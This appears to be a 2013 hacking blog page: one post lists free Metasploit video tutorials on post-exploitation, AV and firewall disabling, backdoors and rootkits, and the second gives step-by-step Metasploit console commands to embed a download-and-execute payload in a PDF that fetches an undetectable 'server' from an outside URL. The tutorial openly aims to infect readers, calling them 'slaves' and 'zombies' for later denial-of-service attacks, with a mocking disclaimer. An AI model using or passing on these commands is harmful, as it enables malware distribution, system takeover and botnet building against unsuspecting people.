Blogger Widgets
Showing posts with label Metasploit. Show all posts
Showing posts with label Metasploit. Show all posts

Sunday, 3 November 2013

Metasploit Framework Expert #Metasploit #Hacking #Infosec #Vulnearbility #Exploit #Overflow #Pentesting


Metasploit is?

It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.

Hacking through Metasploit is done in 3 simple steps: Point, Click, Own.


Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)


Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.


Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.


Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.

Payload: Actual code which runs on the compromised system after exploitation

A non-exhaustive list of topics on the tutorial videos includes:


•Metasploit Basics and Framework Organization
•Server and Client Side Exploitation
•Meterpreter - Extensions and Scripting
•Database Integration and Automated Exploitation
•Post Exploitation Kung-Fu - Exploring the system, Privilege escalation, Log deletion and AV / Firewall bypass
•Token stealing and impersonation, Backdoors and Rootkits, Pivoting and Port forwarding, Railgun and Custom Scripting, Backdoor an Executable
•Ruby Primer for Hackers
•Writing Metasploit Modules - Auxiliary and Exploit
•Exploit research with Metasploit- Buffer Overlows, SEH, DEP Bypass, Return Oriented Programming
•Social Engineering Toolkit (SET) and Armitage
•Scenario Based Hacking using Metasploit
 


TUTORIAL VIDEOS ARE ABSOLUTELY FREE.

 The advantages about this video tutorials is that they explain Metaspoilt into details; and you can learn at your own pace in each step; no hurries-Click On Your Desirable topics-(In Bracket)
  1. Metasploit Framework Expert Part 1 (Exploitation Basics)
  2. Metasploit Framework Expert Part 2 ( Why Metasploit? )
  3.  Metasploit Framework Expert Part 3 ( Meterpreter Basics )
  4.  Metasploit Framework Expert Part 4 (Framework Organization)
  5.  Metasploit Framework Expert Part 5 (Post Exploitation Kung-Fu)
  6.  Metasploit Framework Expert Part 6 (Post Exploitation Privilege Escalation)
  7.  Metasploit Framework Expert Part 7 (Killing Av And Disabling Firewall)
  8.  Metasploit Framework Expert Part 8 (Stdapi And Priv Extensions)
  9. Metasploit Framework Expert Part 9 (Token Stealing And Incognito)
  10. Metasploit Framework Expert Part 10 (Espia And Sniffer Extensions In Post Exploitation)
  11.  Metasploit Framework Expert Part 11 (Post Exploitation Backdoors)
  12.  Metasploit Framework Expert Part 12 (Pivoting After Post Exploitation)
  13.  Metasploit Framework Expert Part 13 (Port Forwarding As Part Of Post Exploitation)
  14. Metasploit Framework Expert Part 14 (Client Side Exploits)
  15.  Metasploit Framework Expert Part 15 (Backdoors And Rootkits In Post Exploitation)
  16.  Metasploit Framework Expert Part 16 (Exploit Research With Metasploit)
  17.  Metasploit Framework Expert Part 17 (Railgun Basics)
  18. Metasploit Framework Expert Part 18 (Railgun Adding Functions)
  19.  Metasploit Framework Expert Part 19 (Railgun Adding New Dlls)
  20.  Metasploit Framework Expert Part 19A (Railgun Adding New Dlls On Windows 7)
  21. Metasploit Framework Expert Part 20 (Resource Scripts)
  22.  Metasploit Framework Expert Part 21 (Database Support)
  23. Metasploit Framework Expert Part 22 (Using Plugins)
  24.  Metasploit Framework Expert Part 23 (Meterpreter Api Basics)
  25.  Metasploit Framework Expert Part 24 (Meterpreter Scripting Migrate Clone)
  26. Metasploit Framework Expert Part 25 (Meterpreter Scripting Process Name Search)

Tools website-Click H3R3


Sorry Guys but I just need 15 Seconds from you guys-create some cash flow that will keep my hobbie of blogging about Infosec, Hacking,Techie Stuff running-
You already know the drill: if you're stuck or puzzled just check out the pictures below
 Skip Ad's where you  click to after 5 Seconds-Thanks Again For Visiting :)


Wednesday, 30 October 2013

Backdoor PDF #Hacker #Hacking #Exploit #Hacker #Pdf #Backdoor





This tutorial will guide you how to backdoor a PDF. What this basically does is that it will download your server when someone opens your PDF file I am not responsible for what you use this guide for *Giggling* {Try not to infect the entire PDF files on the Internet,some of us love reading} *Smirking*


Tutorial:


Requirements:

-Metasploit, 
-A PDF eBook 
-And a FUD server. 


Metasploit can be downloaded from HERE


Search the web for free eBooks if you don't have any on your e-library

>>Make your PDF file ready, upload your FUD server to a hosting service which provides direct download links, I would use Dropbox, Mediafire, 4shared, 2shared

>>And make sure that you have installed Metasploit correctly!



Now we will infect the PDF file


1. Open up Metasploit console


2. Type this in the console: use exploit/windows/fileformat/adobe_pdf_embedded_exe


3. Type this in the console: set payload windows/download_exec


4. Type this in console: set INFILENAME <location of your pdf to infect here>

EXAMPLE: set INFILENAME C:/Users/Owner/Desktop/example.pdf


5. Type this in console: set url <direct download link to your fud server>

EXAMPLE: set url http://download.com/server.exe


6. Type this in console: Exploit

Now you have infected your PDF file and you will be ready to send it out, when people open the infected PDF file then it will download your server and *BAM* new slave.

(The infected PDF file will be in the same directory as the original and will be named “evil.pdf”)

-Ok, that's how you get your zombies,..they may come in handy when you decide to execute a distributed denial of service attack- *Chuckles* "Yeah I was never here, when you get caught: you're on your own" That phrase simply means am not responsible for any trouble,complications or holes you fall into during your adventures-  *Flips & Slides*